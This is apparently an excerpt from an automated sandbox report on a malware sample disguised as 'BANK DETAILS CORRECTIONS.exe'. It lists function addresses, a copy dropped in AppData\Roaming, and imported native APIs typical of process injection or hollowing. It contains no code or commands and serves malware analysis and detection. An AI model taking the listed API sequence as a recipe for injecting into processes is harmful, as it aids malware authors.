                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962AF0 NtWriteFile,12_2_01962AF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962DB0 NtEnumerateKey,12_2_01962DB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962DD0 NtDelayExecution,12_2_01962DD0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962D10 NtMapViewOfSection,12_2_01962D10
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962D00 NtSetInformationFile,12_2_01962D00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962D30 NtUnmapViewOfSection,12_2_01962D30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962CA0 NtQueryInformationToken,12_2_01962CA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962CC0 NtQueryVirtualMemory,12_2_01962CC0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962CF0 NtOpenProcess,12_2_01962CF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962C00 NtQueryInformationProcess,12_2_01962C00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962C60 NtCreateKey,12_2_01962C60
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962F90 NtProtectVirtualMemory,12_2_01962F90
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962FB0 NtResumeThread,12_2_01962FB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962FA0 NtQuerySection,12_2_01962FA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962FE0 NtCreateFile,12_2_01962FE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962F30 NtCreateSection,12_2_01962F30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962F60 NtCreateProcessEx,12_2_01962F60
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962E80 NtReadVirtualMemory,12_2_01962E80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962EA0 NtAdjustPrivilegesToken,12_2_01962EA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962EE0 NtQueueApcThread,12_2_01962EE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962E30 NtWriteVirtualMemory,12_2_01962E30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01963090 NtSetValueKey,12_2_01963090
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01963010 NtOpenDirectoryObject,12_2_01963010
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019639B0 NtGetContextThread,12_2_019639B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01963D10 NtOpenProcessToken,12_2_01963D10
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01963D70 NtOpenThread,12_2_01963D70
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_0135DCB40_2_0135DCB4
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_053B85680_2_053B8568
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_053B81540_2_053B8154
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_053B855A0_2_053B855A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_053B00060_2_053B0006
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_053B00400_2_053B0040
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_053B14900_2_053B1490
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_053BB2C00_2_053BB2C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D76C80_2_076D76C8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D21290_2_076D2129
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D50E00_2_076D50E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D6D0B0_2_076D6D0B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D6D180_2_076D6D18
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076DDC480_2_076DDC48
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D4CA80_2_076D4CA8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076DE9000_2_076DE900
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 0_2_076D68E00_2_076D68E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040282012_2_00402820
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040F8C712_2_0040F8C7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_004032E512_2_004032E5
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_004032F012_2_004032F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00402B1012_2_00402B10
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00401BD512_2_00401BD5
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00401BE012_2_00401BE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00417C5312_2_00417C53
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_004114E312_2_004114E3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00401DB012_2_00401DB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040F77912_2_0040F779
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0041170312_2_00411703
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040F78312_2_0040F783
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0042DF9312_2_0042DF93
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00402FA612_2_00402FA6
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_00402FB012_2_00402FB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F01AA12_2_019F01AA
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E81CC12_2_019E81CC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CA11812_2_019CA118
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192010012_2_01920100
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B815812_2_019B8158
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C200012_2_019C2000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E3F012_2_0193E3F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F03E612_2_019F03E6
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EA35212_2_019EA352
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B02C012_2_019B02C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D027412_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F059112_2_019F0591
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193053512_2_01930535
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DE4F612_2_019DE4F6
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D442012_2_019D4420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E244612_2_019E2446
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192C7C012_2_0192C7C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195475012_2_01954750
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193077012_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194C6E012_2_0194C6E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A012_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019FA9A612_2_019FA9A6
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194696212_2_01946962
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019168B812_2_019168B8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E8F012_2_0195E8F0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193A84012_2_0193A840
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E6BD712_2_019E6BD7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EAB4012_2_019EAB40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA8012_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01948DBF12_2_01948DBF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192ADE012_2_0192ADE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CCD1F12_2_019CCD1F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193AD0012_2_0193AD00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0CB512_2_019D0CB5
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920CF212_2_01920CF2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930C0012_2_01930C00
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AEFA012_2_019AEFA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01922FC812_2_01922FC8
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193CFE012_2_0193CFE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01950F3012_2_01950F30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D2F3012_2_019D2F30
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01972F2812_2_01972F28
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A4F4012_2_019A4F40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942E9012_2_01942E90
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019ECE9312_2_019ECE93
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EEEDB12_2_019EEEDB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EEE2612_2_019EEE26
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930E5912_2_01930E59
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193B1B012_2_0193B1B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191F17212_2_0191F172
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019FB16B12_2_019FB16B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0196516C12_2_0196516C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DF0CC12_2_019DF0CC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019370C012_2_019370C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E70E912_2_019E70E9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EF0E012_2_019EF0E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0197739A12_2_0197739A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E132D12_2_019E132D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191D34C12_2_0191D34C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019352A012_2_019352A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194B2C012_2_0194B2C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D12ED12_2_019D12ED
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CD5B012_2_019CD5B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E757112_2_019E7571
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EF43F12_2_019EF43F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192146012_2_01921460
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EF7B012_2_019EF7B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019217EC12_2_019217EC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E16CC12_2_019E16CC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C591012_2_019C5910
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193995012_2_01939950
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194B95012_2_0194B950
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019338E012_2_019338E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199D80012_2_0199D800
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194FB8012_2_0194FB80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A5BF012_2_019A5BF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0196DBF912_2_0196DBF9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFB7612_2_019EFB76
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CDAAC12_2_019CDAAC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01975AA012_2_01975AA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D1AA312_2_019D1AA3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DDAC612_2_019DDAC6
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFA4912_2_019EFA49
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E7A4612_2_019E7A46
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A3A6C12_2_019A3A6C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194FDC012_2_0194FDC0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E1D5A12_2_019E1D5A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01933D4012_2_01933D40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E7D7312_2_019E7D73
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFCF212_2_019EFCF2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A9C3212_2_019A9C32
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01931F9212_2_01931F92
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFFB112_2_019EFFB1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EFF0912_2_019EFF09
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01939EB012_2_01939EB0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04BCDCB413_2_04BCDCB4
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD856813_2_04CD8568
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD815413_2_04CD8154
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD855913_2_04CD8559
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD004013_2_04CD0040
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CD000613_2_04CD0006
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04CDB2C013_2_04CDB2C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D2C6E013_2_04D2C6E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_04D2C6D013_2_04D2C6D0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052FDC4813_2_052FDC48
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F113813_2_052F1138
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F114813_2_052F1148
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052FCC6813_2_052FCC68
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F13D813_2_052F13D8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F2E8713_2_052F2E87
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F2E9813_2_052F2E98
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F876C813_2_06F876C8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F850E013_2_06F850E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F8CF2813_2_06F8CF28
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F84CA813_2_06F84CA8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F86D1813_2_06F86D18
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F86D0B13_2_06F86D0B
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F8DBE013_2_06F8DBE0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_06F868E013_2_06F868E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 13_2_052F13E813_2_052F13E8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151010020_2_01510100
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0156600020_2_01566000
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015A02C020_2_015A02C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152053520_2_01520535
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0154475020_2_01544750
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152077020_2_01520770
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151C7C020_2_0151C7C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153C6E020_2_0153C6E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153696220_2_01536962
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015229A020_2_015229A0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152A84020_2_0152A840
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152284020_2_01522840
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0154E8F020_2_0154E8F0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155889020_2_01558890
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015068B820_2_015068B8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151EA8020_2_0151EA80
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152ED7A20_2_0152ED7A
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152AD0020_2_0152AD00
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01528DC020_2_01528DC0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151ADE020_2_0151ADE0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01538DBF20_2_01538DBF
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01520C0020_2_01520C00
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01510CF220_2_01510CF2
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01594F4020_2_01594F40
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01540F3020_2_01540F30
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01562F2820_2_01562F28
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01512FC820_2_01512FC8
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0159EFA020_2_0159EFA0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01520E5920_2_01520E59
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01532E9020_2_01532E90
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0150F17220_2_0150F172
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155516C20_2_0155516C
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152B1B020_2_0152B1B0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0150D34C20_2_0150D34C
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015233F320_2_015233F3
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153B2C020_2_0153B2C0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153D2F020_2_0153D2F0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015252A020_2_015252A0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0151146020_2_01511460
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015674E020_2_015674E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152349720_2_01523497
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152B73020_2_0152B730
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152995020_2_01529950
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153B95020_2_0153B950
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0152599020_2_01525990
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0158D80020_2_0158D800
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_015238E020_2_015238E0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01595BF020_2_01595BF0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0155DBF920_2_0155DBF9
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153FB8020_2_0153FB80
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01593A6C20_2_01593A6C
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01523D4020_2_01523D40
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_0153FDC020_2_0153FDC0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01599C3220_2_01599C32
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01539C2020_2_01539C20
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01521F9220_2_01521F92
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: 20_2_01529EB020_2_01529EB0
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: String function: 01567E54 appears 97 times
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeCode function: String function: 0158EA12 appears 36 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: String function: 01965130 appears 58 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: String function: 019AF290 appears 105 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: String function: 01977E54 appears 100 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: String function: 0199EA12 appears 86 times
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: String function: 0191B970 appears 283 times
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1296298907.0000000004080000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWagon.dll> vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1304078204.0000000007F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs BANK DETAILS CORRECTIONS.exe
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWagon.dll> vs BANK DETAILS CORRECTIONS.exe
